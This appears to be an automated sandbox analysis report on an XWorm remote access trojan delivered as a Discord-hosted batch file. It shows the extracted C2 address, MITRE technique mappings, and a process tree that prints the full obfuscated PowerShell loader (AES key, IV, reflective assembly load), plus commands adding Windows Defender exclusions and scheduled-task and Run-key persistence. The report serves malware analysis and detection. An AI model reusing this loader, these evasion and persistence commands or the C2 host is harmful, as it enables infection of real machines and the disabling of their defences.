xworm | hxxps://cdn[.]discordapp[.]com/attachments/1303767638547234836/1304138633686814834/Start[.]bat?ex=672e4d3f&is=672cfbbf&hm=9988df6f36f64cc41ae51d4ed4b550207a8bacbb610cfec92ae3add6388c0140&

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2024 17:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1303767638547234836/1304138633686814834/Start.bat?ex=672e4d3f&is=672cfbbf&hm=9988df6f36f64cc41ae51d4ed4b550207a8bacbb610cfec92ae3add6388c0140&

Score

10^/10

xworm discovery evasion execution persistence privilege_escalation rat trojan

Malware Config

Extracted

Family

xworm

here-thinking.gl.at.ply.gg:50161

Attributes

Install_directory
%LocalAppData%
install_file
WindowsSecurity.exe

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/5248-240-0x00000294B8620000-0x00000294B862E000-memory.dmp	disable_win_def

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/5248-82-0x00000294B84D0000-0x00000294B84E8000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
35	5248	powershell.exe
50	5248	powershell.exe
58	5248	powershell.exe
35	5248	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5248	powershell.exe
5732	powershell.exe
5920	powershell.exe
6092	powershell.exe
5228	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2660	netsh.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecurity.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5752	WindowsSecurity.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsSecurity = "C:\\Users\\Admin\\AppData\\Local\\WindowsSecurity.exe"	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 848937.crdownload:SmartScreen	msedge.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5388	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1036	msedge.exe
1036	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
2216	identity_helper.exe
2216	identity_helper.exe
2332	msedge.exe
2332	msedge.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5732	powershell.exe
5732	powershell.exe
5732	powershell.exe
5920	powershell.exe
5920	powershell.exe
5920	powershell.exe
6092	powershell.exe
6092	powershell.exe
6092	powershell.exe
5228	powershell.exe
5228	powershell.exe
5228	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe
5248	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	5248	powershell.exe
Token: SeDebugPrivilege	5732	powershell.exe
Token: SeDebugPrivilege	5920	powershell.exe
Token: SeDebugPrivilege	6092	powershell.exe
Token: SeDebugPrivilege	5228	powershell.exe
Token: SeDebugPrivilege	5248	powershell.exe
Token: SeDebugPrivilege	5752	WindowsSecurity.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe
4876	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5248	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4876 wrote to memory of 2556	4876	msedge.exe	84
PID 4876 wrote to memory of 2556	4876	msedge.exe	84
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 3348	4876	msedge.exe	85
PID 4876 wrote to memory of 1036	4876	msedge.exe	86
PID 4876 wrote to memory of 1036	4876	msedge.exe	86
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87
PID 4876 wrote to memory of 2516	4876	msedge.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1303767638547234836/1304138633686814834/Start.bat?ex=672e4d3f&is=672cfbbf&hm=9988df6f36f64cc41ae51d4ed4b550207a8bacbb610cfec92ae3add6388c0140&
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0x100,0x104,0xfc,0x108,0x7ffc5f3146f8,0x7ffc5f314708,0x7ffc5f314718
  2⤵
  PID:2556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
  2⤵
  PID:3348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8
  2⤵
  PID:2516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  2⤵
  PID:3112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:3696
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
  2⤵
  PID:4224
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2216
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4928 /prefetch:8
  2⤵
  PID:552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4188 /prefetch:1
  2⤵
  PID:2656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:1
  2⤵
  PID:3600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
  2⤵
  PID:1928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
  2⤵
  PID:2196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
  2⤵
  PID:4728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Start.bat" "
  2⤵
  PID:2760
- - C:\Windows\system32\net.exe
    net file
    3⤵
    PID:5208
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:5228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('27jXWmBLhZ57TWCNzl8OUYh+wCBetw3RQcSzPMTIqKM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('87DbUB13302ugLxYWZH9mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OVhIO=New-Object System.IO.MemoryStream(,$param_var); $EvJEQ=New-Object System.IO.MemoryStream; $zfGcX=New-Object System.IO.Compression.GZipStream($OVhIO, [IO.Compression.CompressionMode]::Decompress); $zfGcX.CopyTo($EvJEQ); $zfGcX.Dispose(); $OVhIO.Dispose(); $EvJEQ.Dispose(); $EvJEQ.ToArray();}function execute_function($param_var,$param2_var){ $LYRjP=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Hahue=$LYRjP.EntryPoint; $Hahue.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Start.bat';$ehvDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Start.bat').Split([Environment]::NewLine);foreach ($ILTkC in $ehvDa) { if ($ILTkC.StartsWith(':: ')) { $HlPyM=$ILTkC.Substring(3); break; }}$payloads_var=[string[]]$HlPyM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops startup file
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:5248
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5732
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5920
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\WindowsSecurity.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSecurity.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5228
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSecurity" /tr "C:\Users\Admin\AppData\Local\WindowsSecurity.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5388
  - - C:\Windows\System32\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,3683373738756777752,5893792021827992144,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5092 /prefetch:2
  2⤵
  PID:4220

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:932

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2736

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
PID:5632

C:\Users\Admin\AppData\Local\WindowsSecurity.exe
C:\Users\Admin\AppData\Local\WindowsSecurity.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0a9dc42e4013fc47438e96d24beb8eff

SHA1
806ab26d7eae031a58484188a7eb1adab06457fc

SHA256
58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151

SHA512
868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
61cef8e38cd95bf003f5fdd1dc37dae1

SHA1
11f2f79ecb349344c143eea9a0fed41891a3467f

SHA256
ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e

SHA512
6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
186B

MD5
094ab275342c45551894b7940ae9ad0d

SHA1
2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

SHA256
ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

SHA512
19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
35548b4b201dd6a080c682f2ca6ac418

SHA1
40578a7f5be405f7408899147a43a068fbe8c32f

SHA256
8070a1bfd08a70e5caaa288f255a682f278d83e164528d74312e27f8744ed8f0

SHA512
693a5ae4efe4d6e0d4ecf5005d27a323a056c9c2b93bcbd8d3e5b715fc3584992fbb2955dd71ac9d446c4005fb5c50edacecb57aae7aa12c91986f179f8beaf4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
d0aee98c7321734a5dd15c1b1e1c387b

SHA1
a34ac66960ca28708e56a07dbe87cbccd4f78467

SHA256
c4a6aecfc210cfce0b85041cf7761cba048a3bc6018477254dede4ee71a459ee

SHA512
a4b938de15303a2d4129037301ebab6064c8b431b525c329a1c8d42473d0e356b62fcf098163eb3206efd48a67972bb1e01bbff2387714465f09f84cd309973f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

